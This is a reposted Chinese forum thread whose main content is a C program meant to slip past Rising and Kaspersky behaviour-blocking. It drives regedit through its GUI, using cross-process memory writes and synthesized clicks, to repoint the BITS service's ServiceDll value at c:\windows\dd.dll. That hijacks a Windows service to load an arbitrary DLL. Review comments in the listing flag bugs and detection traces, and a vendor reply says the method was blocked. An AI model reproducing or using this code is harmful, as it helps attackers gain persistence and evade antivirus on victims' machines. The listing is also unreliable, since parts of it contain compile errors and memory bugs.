
[转载] 修改注册表(暂时过瑞星和卡巴主防)

修改注册表(暂时过瑞星和卡巴主防)

by:careful_snow
通过Gui Hack的方式来修改注册表。。。

对付瑞星、卡巴等主动防御还是可以的。。。
缺点,隐蔽性不好。。。。。。

#include <windows.h>
#include <CommCtrl.h>
#include <stdio.h>
#include <TLHELP32.H>


// Returns the process id of the first running process whose image name equals
// ProcessName (case-insensitive), or 0 when no such process exists or the
// snapshot cannot be taken. ProcessName is a bare image name such as
// "regedit.exe".
DWORD GetProcessID(char *ProcessName)
{
PROCESSENTRY32 pe32;
pe32.dwSize=sizeof(pe32);
// Take a snapshot of every process in the system.
HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hProcessSnap==INVALID_HANDLE_VALUE)
{
printf("CreateToolhelp32Snapshot error");
return 0;
// NOTE(review): the "if" opened above is never closed with "}" as posted, so
// the braces in this function do not balance and the listing does not compile
// verbatim.
// Enumerate the first process in the snapshot.
BOOL bProcess=Process32First(hProcessSnap,&pe32);
while(bProcess)
{
// Compare the found process name with the one we are looking for; on a
// match return its process id.
// NOTE(review): the snapshot handle is not closed on this early return.
if(stricmp(pe32.szExeFile,ProcessName)==0)
return pe32.th32ProcessID;
// Keep searching.
bProcess=Process32Next(hProcessSnap,&pe32);
}
CloseHandle(hProcessSnap);
return 0;
}


// Scans a run of sibling tree-view items living in another process, starting
// at hItem, and returns the first item whose label equals szText
// (case-insensitive). Returns NULL when no sibling matches or when any of the
// cross-process steps fails.
//
// hProcess: handle to the process that owns the tree view, used for remote
//           allocation, WriteProcessMemory and ReadProcessMemory.
// hwnd:     the SysTreeView32 window inside that process.
//
// TVM_GETITEM (TreeView_GetItem) expects the TVITEM structure and its text
// buffer to be in the address space of the window's owning process, which is
// why both are allocated with VirtualAllocEx and filled via WriteProcessMemory.
HTREEITEM FindItem(HANDLE hProcess,HWND hwnd,HTREEITEM hItem,char *szText)
{

// NOTE(review): PAGE_EXECUTE_READWRITE grants execute permission to what is
// only a data buffer; a remote RWX allocation followed by WriteProcessMemory
// into another process is precisely the pattern host-based defenses flag as
// injection-like, so from a detection standpoint this is the loudest step.
TV_ITEM *item=(TV_ITEM*)VirtualAllocEx(hProcess,0,sizeof(TV_ITEM),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (item==NULL)
{
printf("alloc memory failed\n");
return NULL;
}
char *itemText=(char*)VirtualAllocEx(hProcess,0,260,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
// NOTE(review): this re-tests item, which already passed above; the result of
// the second VirtualAllocEx (itemText) is never checked.
if (item==NULL)
{
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
printf("alloc memory failed\n");
return NULL;
}
TV_ITEM initItem;
while (hItem!=NULL)
{
// Describe the request: the label of hItem, written into the remote buffer.
initItem.hItem=hItem;
// LVIF_TEXT is the ListView flag; the TreeView equivalent is TVIF_TEXT. Both
// are 0x0001 in the SDK headers, so this happens to work.
initItem.mask=LVIF_TEXT;
initItem.pszText=itemText;
initItem.cchTextMax=260;
if (!WriteProcessMemory(hProcess,item,&initItem,sizeof(TV_ITEM),0))
{
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,itemText,0,MEM_RELEASE);
printf("WriteProcessMemory failed");
return NULL;
}
// Sends TVM_GETITEM; the control fills in the remote TV_ITEM / text buffer.
if (!TreeView_GetItem(hwnd,item))
{
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,itemText,0,MEM_RELEASE);
printf("get item failed\n");
return NULL;
}
DWORD dwRead;
char itemName[260];
// Copy the label back into this process. Relies on the control having
// NUL-terminated the text within cchTextMax before stricmp reads it.
if(!ReadProcessMemory(hProcess,itemText,itemName,260,&dwRead))
{
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,itemText,0,MEM_RELEASE);
printf("read item name failed\n");
return NULL;
}
if (stricmp(itemName,szText)==0)
{
// Match: release the remote buffers and hand the item back.
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,itemText,0,MEM_RELEASE);
return hItem;
}

// Move on to the next sibling at the same tree level.
hItem=TreeView_GetNextSibling(hwnd,hItem);
}
// Exhausted the siblings without a match.
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,itemText,0,MEM_RELEASE);
return NULL;

}


// Drives an already-running regedit.exe through its left-hand tree view,
// selecting and expanding, level by level, the path
//   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Parameters
// so that the right-hand list view ends up showing that key's values.
// Returns TRUE only if every level (including a child of Parameters) was
// found; FALSE on any failure. All progress is made through window messages
// (TVM_SELECTITEM / TVM_EXPAND) and FindItem's cross-process lookups.
//
// NOTE(review): the final TreeView_GetChild on "Parameters" returns NULL
// whenever that key has no subkeys, so in that case the function reports
// FALSE even though the selection has already been made. That is presumably
// why main only prints "ok" on TRUE and continues regardless of the result.
BOOL SelectDestTreeItem()
{
DWORD pid=GetProcessID("regedit.exe");
if (pid==0)
{
printf("the process not exist\n");
return FALSE;
}
// NOTE(review): bInheritHandle=TRUE and PROCESS_ALL_ACCESS are broader than
// the cross-process memory operations in FindItem require. hProcess is only
// ever passed through to FindItem.
HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,TRUE,pid);
if (hProcess==NULL)
{
printf("open process failed\n");
return FALSE;
}


// Top-level regedit frame, then its tree view child.
// (The message text says "fialed" — a typo in the runtime string, left as is.)
HWND hwnd=::FindWindowEx(NULL,NULL,"RegEdit_RegEdit",NULL);
if(hwnd==NULL)
{
printf("find regedit windows fialed\n");
CloseHandle(hProcess);
return FALSE;
}
hwnd=FindWindowEx(hwnd,NULL,"SysTreeView32",NULL);
if (hwnd==NULL)
{
CloseHandle(hProcess);
return FALSE;
}
// Root node ("My Computer" in regedit): select it, expand it, descend to its
// first child, then search the siblings at that level for the next path
// component. The same select / expand / descend / FindItem sequence repeats
// for every level below.
HTREEITEM hItem=TreeView_GetRoot(hwnd);
TreeView_SelectItem(hwnd,hItem);
TreeView_Expand(hwnd,hItem,TVE_EXPAND);
hItem=TreeView_GetChild(hwnd,hItem);
if (hItem==NULL)
{
CloseHandle(hProcess);
return FALSE;
}

// Level 1: the HKEY_LOCAL_MACHINE hive.
hItem=FindItem(hProcess,hwnd,hItem,"HKEY_LOCAL_MACHINE");
if (hItem==NULL)
{
printf("get HKEY_LOCAL_MACHINE failed");
CloseHandle(hProcess);
return FALSE;
}
TreeView_SelectItem(hwnd,hItem);
TreeView_Expand(hwnd,hItem,TVE_EXPAND);
hItem=TreeView_GetChild(hwnd,hItem);
if (hItem==NULL)
{
CloseHandle(hProcess);
return FALSE;
}

// Level 2: SYSTEM.
hItem=FindItem(hProcess,hwnd,hItem,"SYSTEM");
if (hItem==NULL)
{
printf("get SYSTEM failed");
CloseHandle(hProcess);
return FALSE;
}
TreeView_SelectItem(hwnd,hItem);
TreeView_Expand(hwnd,hItem,TVE_EXPAND);
hItem=TreeView_GetChild(hwnd,hItem);
if (hItem==NULL)
{
CloseHandle(hProcess);
return FALSE;
}

// Level 3: CurrentControlSet.
hItem=FindItem(hProcess,hwnd,hItem,"CurrentControlSet");
if (hItem==NULL)
{
printf("get CurrentControlSet failed");
CloseHandle(hProcess);
return FALSE;
}
TreeView_SelectItem(hwnd,hItem);
TreeView_Expand(hwnd,hItem,TVE_EXPAND);
hItem=TreeView_GetChild(hwnd,hItem);
if (hItem==NULL)
{
CloseHandle(hProcess);
return FALSE;
}

// Level 4: Services.
hItem=FindItem(hProcess,hwnd,hItem,"Services");
if (hItem==NULL)
{
printf("get Services failed");
CloseHandle(hProcess);
return FALSE;
}
TreeView_SelectItem(hwnd,hItem);
TreeView_Expand(hwnd,hItem,TVE_EXPAND);
hItem=TreeView_GetChild(hwnd,hItem);
if (hItem==NULL)
{
CloseHandle(hProcess);
return FALSE;
}

// Level 5: the BITS service key.
// NOTE(review): the error text below says "dmboot", which does not match the
// key searched for; it looks like a leftover from an earlier variant.
hItem=FindItem(hProcess,hwnd,hItem,"BITS");
if (hItem==NULL)
{
printf("get dmboot failed");
CloseHandle(hProcess);
return FALSE;
}
TreeView_SelectItem(hwnd,hItem);
TreeView_Expand(hwnd,hItem,TVE_EXPAND);
hItem=TreeView_GetChild(hwnd,hItem);
if (hItem==NULL)
{
CloseHandle(hProcess);
return FALSE;
}

// Level 6: Parameters. Selecting it is what populates the list view that
// OpenDestItemEditDlg later searches. Same stale "dmboot" message here.
hItem=FindItem(hProcess,hwnd,hItem,"Parameters");
if (hItem==NULL)
{
printf("get dmboot failed");
CloseHandle(hProcess);
return FALSE;
}
TreeView_SelectItem(hwnd,hItem);
TreeView_Expand(hwnd,hItem,TVE_EXPAND);
hItem=TreeView_GetChild(hwnd,hItem);
if (hItem==NULL)
{
CloseHandle(hProcess);
return FALSE;
}
CloseHandle(hProcess);
return TRUE;
}


// Looks for a value named szText in regedit's right-hand list view
// (SysListView32), reads back that row's on-screen position, and posts a
// synthesized click plus double-click at it so regedit opens the value's edit
// dialog. Returns FALSE on any failure; the success path returns 0 as well
// (see the end of the function), so the return value carries no information.
//
// As in FindItem, the LVITEM and its text buffer must live in regedit's
// address space for LVM_GETITEMTEXT / LVM_GETITEMPOSITION, hence the remote
// allocations and the WriteProcessMemory / ReadProcessMemory round trips.
BOOL OpenDestItemEditDlg(char *szText)
{
DWORD pid=GetProcessID("regedit.exe");
if (pid==0)
{
printf("the process not exist\n");
return FALSE;
}
// NOTE(review): bInheritHandle=TRUE and PROCESS_ALL_ACCESS are broader than
// the memory operations below require.
HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,TRUE,pid);
if (hProcess==NULL)
{
// NOTE(review): hProcess is NULL on this path, so this CloseHandle does
// nothing useful.
CloseHandle(hProcess);
printf("open process failed\n");
return FALSE;
}
// Top-level regedit frame, then the list view showing the selected key's
// values. ("fialed" is a typo in the runtime string, left as is.)
HWND hwnd=::FindWindowEx(NULL,NULL,"RegEdit_RegEdit",NULL);
if(hwnd==NULL)
{
printf("find regedit windows fialed\n");
CloseHandle(hProcess);
return FALSE;
}
hwnd=FindWindowEx(hwnd,NULL,"SysListView32",NULL);
if (hwnd==NULL)
{
CloseHandle(hProcess);
return FALSE;
}
// NOTE(review): both remote buffers are data only; PAGE_EXECUTE_READWRITE is
// unnecessary and makes the allocation look like code injection to monitors.
LV_ITEM *item=(LV_ITEM*)VirtualAllocEx(hProcess,0,sizeof(LV_ITEM),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (item==NULL)
{
CloseHandle(hProcess);
printf("alloc memory failed\n");
return FALSE;
}
char *keyVauleName=(char*)VirtualAllocEx(hProcess,0,260,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (keyVauleName==NULL)
{

VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
CloseHandle(hProcess);
printf("alloc memory failed\n");
return FALSE;
}

int count=ListView_GetItemCount(hwnd);
printf("count:%d\n",count);
char retKeyVauleName[260]={0};
DWORD dwRead;
// Template LVITEM: LVM_GETITEMTEXT only looks at iSubItem, pszText and
// cchTextMax, so mask is left at 0.
LV_ITEM initItem={0};
initItem.cchTextMax=260;
initItem.iSubItem=0;
initItem.pszText=keyVauleName;
BOOL bFind=FALSE;

// Fetch each row's column-0 text and compare it against szText.
for (int index=0;index<count;index++)
{
if (!WriteProcessMemory(hProcess,item,&initItem,sizeof(LV_ITEM),0))
{
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,keyVauleName,0,MEM_RELEASE);
CloseHandle(hProcess);
printf("WriteProcessMemory failed");
return FALSE;
}
// wParam is the row index; the control writes the text into the remote
// pszText buffer.
SendMessage(hwnd,LVM_GETITEMTEXT,(WPARAM)index,(LPARAM)item);
if(!ReadProcessMemory(hProcess,keyVauleName,retKeyVauleName,260,&dwRead))
{
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,keyVauleName,0,MEM_RELEASE);
CloseHandle(hProcess);
printf("read item name failed\n");
return FALSE;
}
if(stricmp(retKeyVauleName,szText)==0)
{
printf("%s\n",retKeyVauleName);
bFind=TRUE;
break;
}


}
if (!bFind)
{
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,keyVauleName,0,MEM_RELEASE);
CloseHandle(hProcess);
printf("not find\n");
return FALSE;
}
VirtualFreeEx(hProcess,item,0,MEM_RELEASE);
VirtualFreeEx(hProcess,keyVauleName,0,MEM_RELEASE);

// Remote POINT for LVM_GETITEMPOSITION, which likewise needs a buffer in the
// owning process.
PPOINT point=(PPOINT)VirtualAllocEx(hProcess,0,sizeof(POINT),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
// NOTE(review): this tests item (already released above) instead of point, so
// a failed allocation is never detected here.
if (item==NULL)
{
CloseHandle(hProcess);
printf("alloc memory failed\n");
return FALSE;
}
POINT retPoint={0};

// NOTE(review): "index" is the for-loop variable from above; using it here
// relies on the old MSVC rule that leaks the loop variable into the enclosing
// scope and does not compile under standard C++.
ListView_GetItemPosition(hwnd,index,point);
// NOTE(review): copies 260 bytes into retPoint, a POINT on this function's
// stack, overrunning it by far more than its size. The remote allocation is
// page-granular, so the read itself succeeds and the damage lands locally.
if(!ReadProcessMemory(hProcess,point,&retPoint,260,&dwRead))
{
VirtualFreeEx(hProcess,point,0,MEM_RELEASE);
CloseHandle(hProcess);
printf("read point name failed\n");
return FALSE;
}
printf("x:%d,y:%d\n",retPoint.x,retPoint.y);
VirtualFreeEx(hProcess,point,0,MEM_RELEASE);


// Synthesized mouse input slightly inside the item's top-left corner; the
// double-click is what makes regedit open the edit dialog for that value.
// Posted messages are not real input, which is also why SetForegroundWindow
// (commented out below) was evidently tried.
PostMessage(hwnd,WM_LBUTTONDOWN,0,MAKELPARAM(retPoint.x+3,retPoint.y+1));
PostMessage(hwnd,WM_LBUTTONUP,0,MAKELPARAM(retPoint.x+3,retPoint.y+1));
PostMessage(hwnd,WM_LBUTTONDBLCLK,0,MAKELPARAM(retPoint.x+3,retPoint.y+1));
/* SetForegroundWindow(hwnd);*/



CloseHandle(hProcess);



// NOTE(review): returns 0 (FALSE) even after succeeding; main ignores the
// result anyway.
return 0;


}



// Waits for regedit's "Edit String" dialog to appear, sets its edit control to
// keyVaule and presses the OK button by posting mouse messages. The window
// title "编辑字符串" and the button caption "确定" are the Chinese-localized
// strings, so the lookups only match on a Chinese Windows UI. Always returns
// TRUE, whether or not any of the windows was found.
BOOL EditKeyVaule(char *keyVaule)
{
HWND hwnd=NULL;
// Busy-wait with no Sleep and no timeout until a top-level window with that
// title exists; spins at full CPU and never gives up if the dialog does not
// open.
do
{
hwnd=::FindWindowEx(NULL,NULL,NULL,"编辑字符串");

} while (hwnd==NULL);

HWND hKeyVaule=NULL;
do
{
hKeyVaule=FindWindowEx(hwnd,NULL,"Edit",NULL);

// NOTE(review): the condition tests the keyVaule parameter rather than
// hKeyVaule, so this loop runs exactly once and hKeyVaule may still be NULL.
} while (keyVaule==NULL);

// Replace the dialog's edit text with the new value.
SendMessage(hKeyVaule,WM_SETTEXT,0,(LPARAM)keyVaule);
HWND hOk=NULL;
do
{
hOk=FindWindowEx(hwnd,NULL,"Button","确定");

} while (hOk==NULL);

// Synthesized click on OK. WM_LBUTTONDOWN is posted twice as written.
PostMessage(hOk,WM_LBUTTONDOWN,0,0);
PostMessage(hOk,WM_LBUTTONDOWN,0,0);
PostMessage(hOk,WM_LBUTTONUP,0,0);



// SetWindowText(hwnd,keyVaule);
return TRUE;

}

// Entry point. Launches regedit, steers it to
// HKLM\SYSTEM\CurrentControlSet\Services\BITS\Parameters, opens the edit
// dialog for the "ServiceDll" value and replaces it with a hard-coded DLL
// path. ServiceDll is the value svchost reads to decide which DLL hosts the
// service, so the net effect is re-pointing the BITS service at that DLL,
// done purely through GUI automation instead of registry APIs. The fixed
// Sleep() delays are the only synchronization with regedit, which makes the
// whole sequence timing-dependent.
//
// Defender note: the approach leaves a distinctive trail — regedit.exe
// started by a console program rather than the shell, a foreign process
// allocating RWX memory in regedit and writing to it, synthesized window
// messages, and finally a ServiceDll write under a service key that registry
// auditing records like any other modification. The vendor reply further
// down the thread reports that the change was still blocked by Rising's
// registry protection.
int main(int argc, char* argv[])
{

// Start regedit visibly (nCmdShow=1) and give it time to create its windows.
WinExec("regedit.exe",1);
Sleep(2000);
if (SelectDestTreeItem())
{
printf("ok\n");
}
Sleep(3000);

// Return values of the next two calls are ignored.
OpenDestItemEditDlg("ServiceDll");
Sleep(3000);
EditKeyVaule("c:\\windows\\dd.dll");
return 0;
}






回复:修改注册表(暂时过瑞星和卡巴主防)

刚从网上看到的,不知对2011有效吗?
回复:修改注册表(暂时过瑞星和卡巴主防)

您提供的代码已提交相关部门测试,有测试结果会尽快和您联系。感谢您对瑞星的支持!
回复:修改注册表(暂时过瑞星和卡巴主防)

经测试,此代码无法通过瑞星的注册表保护